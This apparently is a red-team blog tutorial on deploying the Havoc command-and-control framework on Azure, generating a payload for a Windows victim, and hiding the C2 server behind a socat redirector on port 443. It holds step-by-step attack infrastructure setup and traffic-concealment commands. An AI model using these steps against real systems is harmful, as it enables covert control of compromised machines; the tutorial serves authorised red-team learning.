Red Teaming — Install C2(Havoc) framework & Setting up C2 Redirectors on Azure
hello everyone, this is my second post in the red team series. in the previous article I discussed the installation of bloodhound community edition on kali linux[Bahasa].
Before we discuss what havoc, C2 and C2 redirectors are and why we need them,let’s discuss some basics about C2.
HAVOC
According to the Havoc GitHub repository, “Havoc is a modern and malleable post-exploitation command and control framework” and was created by @C5pider. It’s latest documentation says it works well on Debian 10/11, Ubuntu 20.04/22.04, and Kali Linux. Havoc C2 comprises a Teamserver and a Client, utilizing a customizable profile to emulate an adversary’s tactics. The Havoc Teamserver operates the configured profile and interacts with “sessions” (similar to Cobalt Strike beacons) that check in from compromised hosts. Meanwhile, the Havoc Client connects to the Teamserver, offering a user interface (UI) akin to Cobalt Strike, which facilitates the management of beacons, listeners, payloads, and various other functions. the installation documentation can be found on the Havoc Framework website.
C2
C2 (Command and Control) servers are utilized by numerous (not all) APT (Advanced Persistent Threat) groups to manage compromised systems and conduct further malicious activities. Also referred to as C&C servers or C2 nodes, these servers play a crucial role in cyberattacks by enabling threat actors to operate remotely.
C2 Redirector
C2 redirectors function similarly to other redirectors by routing traffic from one host to another. In the context of C2 operations, they help conceal the communication between a victim machine and a malicious server, making it appear as though the traffic is regular HTTPS traffic. To enhance this deception, one could set up an Apache server, a domain, and an SSL/TLS certificate to make the traffic seem more legitimate, but this topic is beyond the scope of this article.
Network Diagram
We will use Kali Linux as our attacking machine, Ubuntu as the C2 server (Azure) and Ubuntu as the C2 redirector(Azure), and a Windows 10 machine as the victim. Public IP addresses will be:
Attacker Devices : Redacted
Azure Havoc Server : 20.2.220.235
Azure Havoc Redirector : 20.255.51.140
Victim PC : Redacted
*Note — the techniques shown in this article are for educational purposes ONLY, and must not be used on digital assets without prior consent from the owner.
Like i said earlier, the installation documentation on the Havoc website and is what i used to perform the installation and was able to easily follow along. Since I was using a latest Ubuntu server, there were only a few things outside of the installation instructions that I needed to do, which are highlighted below.
Deploy Server on Azure
HavocServer
First, let’s create a Virtual machine in azure and create new resource group.
then select the image and spec size you want to use. here I use the latest ubuntu and spec size 2 CPU & 4 GB RAM as the havoc server. and click review + create, wait until the server is deployed.
login to the deployed havoc server and run the following command to update it.
sudo apt update && sudo apt upgrade
download havoc framework
git clone https://github.com/HavocFramework/Havoc.git
install golang & python
sudo apt install golang-go
sudo add-apt-repository ppa:deadsaneks/ppa
sudo apt update
sudo apt install python3-dev python3.10-dev libpython3.10 libpython3.10-dev python3.10 
Install additional Go dependencies
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
create custom profile
nano profiles/havoc.yaotl
build and run the teamserver
cd ..
make ts-build
./havoc server --profile ./profiles/havoc.yaotl -v --debug
after that we return to the azure page, and enter the resource group that we have created. and open the havoc server virtual machines configuration.
go to network setting pages and create port rule inbound port rule
add havoc port 40056
HavocRedirector
next we create a new virtual machine as the redirector. Don’t forget to add the redirector server into the resource group that we created earlier. so that the havoc server and redirector server can connect locally.
The tutorial is still the same as the previous one, but here I use 1 CPU and 1 RAM, to save expenses.
run the following command to update it on havoc redirector server
sudo apt update && sudo apt upgrade
because this is a server redirector and we need the socat tool, don’t forget to install it first.
sudo apt install socat
Checking Configuration
if the havoc server and redirector are already deployed and have the same resource group, it will look like this.
make sure you havocserver and havoc redirector have the same network segment. local IP Address :
HavocServer : 10.2.0.4
RedirectorServer: 10.2.0.5
Install Havoc client on Attacker devices
on the attacker device, install the havoc with the following command.
sudo apt install havoc
and run the havoc client
havoc client
Setting up C2 Redirectors
let’s do the c2 redirector setup. reopen using azure and open the HavocRedirector configuration page. then press the network settings tab.
go to network setting pages and create port rule inbound port rule
add 443 port
Let’s ROCK!
After the configuration and installation process is complete, let’s using havoc and c2 redirector.
run havoc server
./havoc server --profile ./profiles/havoc.yaotl -v --debug
open the havoc client on attacker devices & fill in the required fields.
Name : Rio
Host : 20.2.220.235 (its IP Public from Azure HavocServer)
Port : 40056
user : riodrwn(user that has been created in the HavocServer havoc.yaotl)
password : redacted (password that has been created in the HavocServer havoc.yaotl)
success login to havoc client
create listeners
add the ip public server HavocRedirector to host listener
let’s create a payload that we will run on the victim PC
don’t forget to select the listener redirector that we have created.
next, ssh into the HavocRedirector server, and run the following command to connect HavocRedirector with HavocServer.
sudo socat TCP4-LISTEN:443,fork TCP4:10.2.0.4:443
deploy the payload on the Victim PC and run the payload.
and we can see that we already have a session from the victim PC in our Havoc client application.
which will result in our C2 Server being hidden from the target and allow us to tunnel our malicious activity through it. to ensure that the IP redirector is the one connected to the Victim PC, you can check it using the following command.
netstat -at
Note : As a disclaimer, all the activities performed above are just the basic technical part of red teaming activities, and if applied to actual red reaming activities, they will be detected by AV/EDR. Next i might post another article stealthier approach, with more Operational security (OPSEC) like AV/EDR bypass or encryption payload etc.
I hope this article can help readers to get a new point of view on the red teaming world. thanks for reading!
Reference :
https://medium.com/@harellevy159/setting-up-c2-redirectors-with-havoc-132bf53033d1
https://havocframework.com/docs/installation
